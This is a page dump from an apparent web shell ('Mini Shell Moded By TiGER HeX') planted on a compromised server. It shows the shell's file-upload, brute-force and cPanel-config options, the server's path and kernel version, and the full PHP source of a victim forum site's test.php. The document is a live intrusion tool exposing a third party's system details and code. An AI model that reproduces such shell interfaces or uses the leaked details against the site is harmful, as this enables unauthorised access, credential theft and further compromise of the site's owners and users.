Mini Shell Moded By TiGER HeX
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
var
/
www
/
ridazz
/
Linux midnightridazz 4.19.0-11-cloud-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
Upload File :
New :
File
Dir
//var/www/ridazz/test.php
<?php include_once('includes/static/configure.php'); include_once('includes/static/util.php'); include_once('includes/static/dbcon2.php'); include_once('includes/static/gdimg.php'); include_once('includes/static/sessions.php'); include_once('includes/appTop2.php'); # <object type="text/html" data="http://midnightridazz.com" style="position:absolute;top:0;left:0;width:1200px;height:1200px;" width=1200 height=1200></object> $preview = ''; $html_msg = ""; if(isset($_REQUEST['reply'])){ $body = sanitize_body(apply_filter($_REQUEST['body'])); if(!$upload_error){ //store reply body $body = get_html_text($body); $body = stripslashes($body); $body = get_clean_text($body); $preview = $body; } } $pg_name = basename($_SERVER['PHP_SELF']); include_once('includes/header.php'); //content $sql = "SELECT page_body FROM 50mm_pages WHERE page_name ='forums'"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } $row = $db->sql_fetchrow($result); echo stripslashes($row['page_body']); ?> <table border="0" cellspacing="0" cellpadding="0"> <tr valign="top"> <td> <? include_once('includes/forumNav.php'); include_once('includes/forumTopics.php'); ?> <br> </td> <td width="20"> </td> <td> <img src="images/spacer.gif" height="45"><br> <!-- begin forum content --> <?php echo $preview; ?> <script> divs = new Array('body'); </script> <form action="<?echo $_SERVER['PHP_SELF']?>" method="post" enctype="multipart/form-data" onSubmit="return validateForm(this,divs,'forumError');"> <table cellspacing="0" cellpadding="4" border="0"> <tr> <td>Image</td> <td><input type="file" name="file" class="field"></td> </tr> <tr> <td>Body<span id="errbody" class="error" style="visibility:hidden;"> *</span></td> <td><textarea name="body" class="body" style="width: 440px; height: 200px;"></textarea></td> </tr> <tr> <td colspan="2" align="center"> <input name="reply" type="submit" value="Post Reply" class="button"> <div id="forumError" class="error" style="visibility:hidden;">Please correct the fields marked by *</div> </td> </tr> </table> <input type="hidden" name="topicId" value="<?echo $topic_id?>"> <? if (is_numeric($reply_to_id)) { echo "<input type=\"hidden\" name=\"reply_to_id\" value=\"$reply_to_id\">";}?> <input type="hidden" name="pgnum" value="<?echo $pgnum?>"> <div class="error"><?echo $html_msg?></div> </form> <!-- end forum content --> </td> </tr> </table> <br> <? include_once('includes/onlineUsers.php'); include_once('includes/footer.php'); include_once('includes/appBottom.php'); ?> ?>